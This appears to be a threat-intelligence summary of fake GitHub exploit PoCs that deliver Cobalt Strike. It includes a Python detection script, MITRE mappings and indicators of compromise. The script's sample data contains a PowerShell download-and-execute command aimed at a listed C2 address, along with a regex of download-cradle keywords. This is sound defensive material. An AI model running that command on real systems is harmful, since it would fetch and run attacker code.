Cyble researchers found a threat actor distributing fake PoCs for CVE-2022-26809 and CVE-2022-24500 on GitHub, targeting the Infosec community. The culprit malware is a .NET binary packed with ConfuserEX that displays fake exploit messages and then calls PowerShell to fetch a Cobalt Strike Beacon from a C2 server.
Key points
- The campaign involves malware disguised as exploit PoCs for CVE-2022-26809 and CVE-2022-24500, hosted on GitHub by a single threat actor profile.
- The attackers used fake proof-of-concept posts to lure Infosec professionals into executing the malware; the exploits were also being discussed on cybercrime forums.
- The malware is a .NET binary packed with ConfuserEX, a free protector for .NET apps, which indicates an obfuscation and anti-analysis intent.
- Despite its claim to exploit the vulnerabilities, the sample only prints a fake exploitation message and then executes shellcode, as shown in the report's figures.
- Sleep()-based delays are used to make the fake messages appear legitimate before the payload runs.
- Following the fake messages, the malware uses PowerShell to contact a C2 server and download the Cobalt Strike Beacon, enabling further malicious activities such as lateral movement or data exfiltration.
- The findings underscore that the Infosec community can be a direct target, highlighting the need to verify the credibility of a source before downloading PoCs.
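The PowerShell-to-C2 stage in the key points above is the most visible host behaviour of this chain. As an added example that is not part of the Cyble report, the following Python scores process-creation events for three independent signals: a PowerShell child spawned by a binary in a user-writable directory, a download cradle in the command line, and contact with either of the two C2 addresses listed in the IoC section. The event schema (Sysmon-like field names with a correlated DestinationIp), the cradle keyword list and the sample events are constructed assumptions.

```python
import json
import re
C2_IPS = {"192.10.22.112", "45.197.132.72"}  # C2 addresses as listed in the report's IoC section
# Generic PowerShell download-cradle markers (constructed; the report does not publish the sample's command line).
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
                       r"\bIEX\b|Invoke-Expression|FromBase64String|-enc(?:odedcommand)?\b", re.I)
POWERSHELL_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
USER_DIR_RE = re.compile(r"\\Users\\[^\\]+\\(?:Downloads|Desktop|AppData)\\", re.I)  # user-writable dirs
ALERT_THRESHOLD = 2  # require two independent signals to keep admin-script noise down

def score_event(ev: dict) -> list[str]:
    """Suspicious signals for one enriched process-creation event (assumed fields: Image, ParentImage, CommandLine, DestinationIp)."""
    reasons = []
    if not POWERSHELL_RE.search(ev.get("Image", "")):
        return reasons  # only PowerShell children are in scope here
    cmd = ev.get("CommandLine", "")
    if USER_DIR_RE.search(ev.get("ParentImage", "")):
        reasons.append("PowerShell spawned by a binary in a user-writable directory")
    if CRADLE_RE.search(cmd):
        reasons.append("download cradle in command line")
    hit = C2_IPS & ({ev.get("DestinationIp")} | set(re.findall(r"\d{1,3}(?:\.\d{1,3}){3}", cmd)))
    if hit:
        reasons.append("known C2 address: " + ", ".join(sorted(hit)))
    return reasons

def scan(jsonl: str) -> list[dict]:
    """Parse JSON-lines events and return those reaching ALERT_THRESHOLD; malformed lines are skipped."""
    alerts = []
    for line in jsonl.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        reasons = score_event(ev)
        if len(reasons) >= ALERT_THRESHOLD:
            alerts.append({"ts": ev.get("UtcTime"), "parent": ev.get("ParentImage"), "reasons": reasons})
    return alerts

# Constructed sample events: the fake-PoC chain, a benign deployment script, and one malformed line.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"UtcTime": "2022-05-20 10:15:03", "Image": PS, "ParentImage": r"C:\Users\analyst\Downloads\CVE-2022-26809-poc.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.10.22.112/x')",
     "DestinationIp": "192.10.22.112"},
    {"UtcTime": "2022-05-20 10:17:05", "Image": PS, "ParentImage": r"C:\Windows\ccmcache\deploy.exe",
     "CommandLine": r"powershell.exe -Command Invoke-WebRequest -Uri http://10.0.0.5/inv.ps1 -OutFile C:\Windows\Temp\inv.ps1",
     "DestinationIp": "10.0.0.5"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + "\nnot json at all"
```

Only the fake-PoC event reaches the threshold; the deployment script trips the cradle check alone and stays below it, which is why the threshold is set at two signals.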
MITRE Techniques
- [T1204] User Execution – The malware relies on user execution via fake PoCs to trigger infection. “The TA used this unique technique to lure individuals into executing the malware.”
- [T1140] Deobfuscate/Decode Files or Information – The binary is packed with ConfuserEX to hinder analysis. “The malware is a .Net binary packed with ConfuserEX, a free, open-source protector for .NET applications.”
- [T1071] Application Layer Protocol – The malware communicates with a C2 server to download the Cobalt Strike Beacon. “the network communication to a command-and-control server for downloading the Cobalt-Strike Beacon.”
Indicators of Compromise
- [IP] C2 IPs – 192.10.22.112, 45.197.132.72
- [Hash] Malicious binaries – MD5: 7e0c8be0d03c75bbdc6fd286a796434a; SHA-1: 0e2e0d26caa32840a720be7f67b49d45094861cb; SHA-256: 6c676773700c1de750c3f8767dbce9106317396d66a004aabbdd29882435d5e0
- [Hash] Malicious binaries – MD5: fdcf0aad080452fa14df221e74cca7d0; SHA-1: 7431846d707140783eea466225e872f8757533e3; SHA-256: fa78d114e4dfff90a3e4ba8c0a60f8aa95745c26cc4681340e4fda79234026fd